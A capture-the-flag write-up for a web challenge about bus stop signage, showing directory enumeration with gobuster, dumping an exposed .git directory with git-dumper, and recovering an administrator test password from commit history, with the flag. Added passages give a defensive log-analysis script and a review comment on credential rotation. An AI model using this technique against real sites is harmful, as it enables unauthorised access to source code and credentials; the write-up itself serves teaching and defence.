Bus Stop (Smart City, 250p)

Your help is also needed for another task.
The previous developer for the bus stop digital signage servers has disappeared into thin air, but information still needs to be updated throughout the city.
You have been asked to help.
Find out if there is some vulnerability, backdoor, misconfiguration, etc. that would allow you to access the system.
Digital Signage Management Interface (http://envXXX.target03:8888/)
Flag will be given when correct login credentials are used.

Solution

As the challenge is broken (PHP is not executed), the flag is revealed straight away.

screenshot of website

The intended way would be to find the .git directory, dump it, read the source and log in to the web page.

# gobuster dir -u http://envXXX.target03:8888 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
===============================================================
/.git/HEAD            (Status: 200) [Size: 23]
/.htpasswd            (Status: 403) [Size: 282]
/.hta                 (Status: 403) [Size: 282]
/.htaccess            (Status: 403) [Size: 282]
/admin.php            (Status: 200) [Size: 134]
/assets               (Status: 301) [Size: 326] [--> http://envXXX.target03:8888/assets/]
/css                  (Status: 301) [Size: 323] [--> http://envXXX.target03:8888/css/]
/index.html           (Status: 200) [Size: 5104]
/js                   (Status: 301) [Size: 322] [--> http://envXXX.target03:8888/js/]
/server-status        (Status: 403) [Size: 282]
# git-dumper http://envXXX.target03:8888/ bus-stop
[-] Testing http://envXXX.target03:8888/.git/HEAD [200]
[-] Testing http://envXXX.target03:8888/.git/ [403]
[-] Fetching common files
[-] Fetching http://envXXX.target03:8888/.gitignore [404]
[-] http://envXXX.target03:8888/.gitignore responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-push.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/description [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-receive.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/post-commit.sample [404]
[-] Fetching http://envXXX.target03:8888/.git/COMMIT_EDITMSG [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/post-update.sample [200]
[-] http://envXXX.target03:8888/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/commit-msg.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/update.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/index [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/info/packs [404]
[-] http://envXXX.target03:8888/.git/objects/info/packs responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/info/exclude [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-commit.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/post-receive.sample [404]
[-] http://envXXX.target03:8888/.git/hooks/post-receive.sample responded with status code 404
[-] Finding refs/
[-] Fetching http://envXXX.target03:8888/.git/FETCH_HEAD [200]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/heads/master [200]
[-] Fetching http://envXXX.target03:8888/.git/HEAD [200]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/stash [404]
[-] http://envXXX.target03:8888/.git/logs/refs/stash responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/packed-refs [404]
[-] http://envXXX.target03:8888/.git/packed-refs responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/heads/master [200]
[-] Fetching http://envXXX.target03:8888/.git/refs/remotes/origin/master [404]
[-] http://envXXX.target03:8888/.git/refs/remotes/origin/master responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/stash [404]
[-] Fetching http://envXXX.target03:8888/.git/info/refs [404]
[-] Fetching http://envXXX.target03:8888/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/remotes/origin/master [404]
[-] http://envXXX.target03:8888/.git/logs/refs/remotes/origin/master responded with status code 404
[-] http://envXXX.target03:8888/.git/refs/wip/wtree/refs/heads/master responded with status code 404
[-] http://envXXX.target03:8888/.git/info/refs responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/ORIG_HEAD [404]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://envXXX.target03:8888/.git/config [200]
[-] http://envXXX.target03:8888/.git/ORIG_HEAD responded with status code 404
[-] http://envXXX.target03:8888/.git/refs/stash responded with status code 404
[-] http://envXXX.target03:8888/.git/logs/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/wip/index/refs/heads/master [404]
[-] http://envXXX.target03:8888/.git/refs/wip/index/refs/heads/master responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/remotes/origin/HEAD [404]
[-] http://envXXX.target03:8888/.git/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/logs/HEAD [200]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://envXXX.target03:8888/.git/objects/42/e23a6abe443e47feaefe7c8e0cdde8851c97a6 [200]
[-] http://envXXX.target03:8888/.git/objects/00/00000000000000000000000000000000000000 responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://envXXX.target03:8888/.git/objects/73/efd808c535c1abc57f27b5f3f2d03ae0685d85 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/bf/a872e4b443bd5514f80d533406b9b900ee872d [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/99/271f43470046f87f451deaf265fe6c0c4ffecd [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/4e/17813c5360263197f8950b4c0d3d9426854c46 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/d0/3a62ac1167d0f2274fecc12cc5cc5df5b09416 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/57/85e5ce1e03383774acddfa8a6660412dc7c019 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/73/0e816400ad8ad66696d1f0d81e44a816c74a00 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/fc/12aacaf79a608d0a02e7d760889a3f87282823 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/76/010d7fa4db028dc71b20d3169a8ce68230f56e [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/c1/20b7ff23f8c7cfff4c5b20bc95a04f39d397fd [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/37/5d135a166feb9a2000454ed88a0c08ba127d41 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/63/1baf94d5bf36747d1722aa50ebb2b6cbef14fc [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/45/d063bf6002a17773628c926df39ba29c9ec3bf [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/8d/1c8b69c3fce7bea45c73efd06983e3c419a92f [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/5e/2e1e4049a6eed1218ac87e4d63dd49876393ec [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/b0/19eea446b07c39c98c18e7b3572ddd0ff5d248 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/03/bcdf54f33baa1367c07c71cc9de6c38d20647a [200]
[-] Running git checkout .
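
A defender's view of the same traffic, as an added example that is not part of the original write-up: the function below reads a web access log and flags clients that were actually served files under /.git/. The log lines, client addresses, verdict names and the `dump_threshold` parameter are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in common log format; addresses, times and sizes are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [04/Oct/2021:16:01:02 +0300] "GET /.git/HEAD HTTP/1.1" 200 23
198.51.100.7 - - [04/Oct/2021:16:01:02 +0300] "GET /.htaccess HTTP/1.1" 403 282
198.51.100.7 - - [04/Oct/2021:16:03:10 +0300] "GET /.git/ HTTP/1.1" 403 282
198.51.100.7 - - [04/Oct/2021:16:03:11 +0300] "GET /.git/index HTTP/1.1" 200 1204
198.51.100.7 - - [04/Oct/2021:16:03:12 +0300] "GET /.git/objects/73/0e816400ad8ad66696d1f0d81e44a816c74a00 HTTP/1.1" 200 160
198.51.100.7 - - [04/Oct/2021:16:03:12 +0300] "GET /.git/objects/fc/12aacaf79a608d0a02e7d760889a3f87282823 HTTP/1.1" 200 2100
203.0.113.9 - - [04/Oct/2021:16:05:00 +0300] "GET /index.html HTTP/1.1" 200 5104
192.0.2.44 - - [04/Oct/2021:16:07:30 +0300] "GET /%2egit/HEAD HTTP/1.1" 200 23
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*" (\d{3}) ')
# Loose objects and pack files: fetching these is what reconstructs the history.
OBJECT = re.compile(
    r"^/\.git/objects/(?:[0-9a-f]{2}/[0-9a-f]{38}|pack/pack-[0-9a-f]{40}\.(?:pack|idx))$")

def git_exposure_report(log_text, dump_threshold=2):
    """Map each client that requested /.git/ paths to what the server gave it."""
    stats = defaultdict(lambda: {"served": 0, "objects": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, raw_path, status = m.groups()
        path = unquote(raw_path.split("?")[0])  # catches %2egit style requests
        if not path.startswith("/.git/"):
            continue
        entry = stats[client]  # record the client even if every request was refused
        if status == "200":
            entry["served"] += 1
            entry["objects"] += bool(OBJECT.match(path))
    for entry in stats.values():
        if entry["objects"] >= dump_threshold:
            entry["verdict"] = "dump"          # repository contents were downloaded
        elif entry["served"]:
            entry["verdict"] = "files-served"  # metadata leaked, exposure confirmed
        else:
            entry["verdict"] = "blocked"       # probing only, nothing returned
    return dict(stats)

if __name__ == "__main__":
    for client, entry in git_exposure_report(SAMPLE_LOG).items():
        print(client, entry)
```

A 403 on /.git/ itself, as in the git-dumper output above, only disables the directory listing; any "files-served" or "dump" verdict means the individual files are still readable.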

Check commits.

# cd bus-stop
~/bus-stop# git log
commit bfa872e4b443bd5514f80d533406b9b900ee872d (HEAD -> master)
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:24:40 2021 +0300

    cat.gif added

commit 730e816400ad8ad66696d1f0d81e44a816c74a00
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:24:05 2021 +0300

    index.php test credz removed

commit 42e23a6abe443e47feaefe7c8e0cdde8851c97a6
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:13:25 2021 +0300

    readme.md initial commit

commit 4e17813c5360263197f8950b4c0d3d9426854c46
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:10:54 2021 +0300

    index.php auth added

commit 76010d7fa4db028dc71b20d3169a8ce68230f56e
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:07:00 2021 +0300

    index.php menu added

commit c120b7ff23f8c7cfff4c5b20bc95a04f39d397fd
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:05:45 2021 +0300

    index.php initial commit

The commit about credential removal looks interesting.

# git show 730e816400ad8ad66696d1f0d81e44a816c74a00
commit 730e816400ad8ad66696d1f0d81e44a816c74a00
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:24:05 2021 +0300

    index.php test credz removed

diff --git a/index.php b/index.php
index fc12aac..d03a62a 100644
--- a/index.php
+++ b/index.php
@@ -33,10 +33,6 @@
         <!-- Header-->
         <!-- <div class="b-example-divider"></div>-->

-        <!-- For TESTING only:
-        username: administrator
-        password: GGFkvo1piK -->
-
         <div class="modal modal-signin position-static d-block bg-secondary py-5" tabindex="-1" role="dialog" id="modalSignin">
         <div class="modal-dialog" role="document">
             <div class="modal-content rounded-5 shadow">
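
Review bot: deleting the "For TESTING only" comment (old lines 36-39 of index.php) takes the administrator password out of the working tree only; the value is still readable in the parent blob fc12aac and in this commit's own diff, so anyone who can read the repository still has it. Rotate the administrator password as part of this change and note the rotation in the commit message; if the credential was never meant to be committed, follow up with a history rewrite. The message "index.php test credz removed" also points directly at the commit that contains the secret, so the credential should be treated as disclosed rather than cleaned up.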

The rest of the intended way could not be tested as the challenge was broken.

The flag is ctf-tech{811d4c0e-33e7}.